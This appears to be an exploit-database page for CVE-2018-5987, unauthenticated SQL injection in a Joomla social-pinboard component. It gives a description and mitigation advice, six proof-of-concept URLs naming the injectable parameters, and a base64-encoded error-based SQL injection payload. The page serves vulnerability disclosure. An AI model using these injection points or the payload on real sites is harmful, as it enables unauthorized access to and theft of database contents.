header-logo
Suggest Exploit
vendor:
Joomla! Pinterest Clone Social Pinboard
by:
Ihsan Sencan
9.8
CVSS
CRITICAL
SQL Injection
89
CWE
Product Name: Joomla! Pinterest Clone Social Pinboard
Affected Version From: 2.0
Affected Version To: 2.0
Patch Exists: NO
Related CWE: CVE-2018-5987
CPE: a:apptha:joomla!_pinterest_clone_social_pinboard:2.0
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: WiN7_x64/KaLiLinuX_x64
2018

Joomla! Pinterest Clone Social Pinboard 2.0 – SQL Injection

Joomla! Pinterest Clone Social Pinboard 2.0 is vulnerable to multiple SQL Injection vulnerabilities. The vulnerabilities exist due to insufficient sanitization of user-supplied input in multiple parameters of the application. An attacker can exploit these vulnerabilities to manipulate SQL queries by injecting arbitrary SQL code, allowing for the manipulation or disclosure of arbitrary data. The vulnerabilities can be exploited without authentication and can be exploited remotely.

Mitigation:

Input validation should be used to ensure that untrusted data is not used to construct SQL queries in an unsafe manner. Parameterized queries should be used to prevent SQL injection.
Source

Exploit-DB raw data:

# # # # 
# Exploit Title: Joomla! Pinterest Clone Social Pinboard 2.0 - SQL Injection
# Dork: N/A
# Date: 16.02.2018
# Vendor Homepage: https://www.apptha.com/
# Software Link: https://www.apptha.com/joomla/social-pinboard-script
# Version: 2.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: CVE-2018-5987
# # # #
# Exploit Author: Ihsan Sencan 
# # # #
# 
# POC:
# 
# 1)
# http://localhost/[PATH]/index.php?option=com_socialpinboard&view=ajaxcontrol&tmpl=component&task=getlikeinfo&pin_id=[SQL]&user_id=[SQL]
# 
# 2)
# http://localhost/[PATH]/index.php?option=com_socialpinboard&view=gift&starts=100&ends=[SQL]
# 
# 3)
# http://localhost/[PATH]/index.php?option=com_socialpinboard&view=home&category=[SQL]
# 
# 4)
# http://localhost/[PATH]/index.php?option=com_socialpinboard&view=pindisplay&uid=[SQL]
# 
# 5)
# http://localhost/[PATH]/index.php?option=com_socialpinboard&view=search&serachVal=[SQL]
# 
# 6)
# http://localhost/[PATH]/index.php?option=com_socialpinboard&view=likes&uid=[SQL]
# 
# MTczODMgQU5EIChTRUxFQ1QgOTI2OCBGUk9NKFNFTEVDVCBDT1VOVCgqKSxDT05DQVQodmVyc2lvbigpLChTRUxFQ1QgKEVMVCg5MjY4PTkyNjgsMSkpKSwweDc4Nzg3ODc4Nzg3ODc4Nzg3ODc4Nzg3ODc4Nzg3ODc4Nzg3ODc4Nzg3ODc4Nzg3ODc4Nzg3ODc4Nzg3ODc4Nzg3ODc4Nzg3ODc4Nzg3ODc4Nzg3ODc4Nzg3OCxGTE9PUihSQU5EKDApKjIpKXggRlJPTSBJTkZPUk1BVElPTl9TQ0hFTUEuUExVR0lOUyBHUk9VUCBCWSB4KWEp
# 
# # # #

Navigation

Suggest Exploit

Services By CQR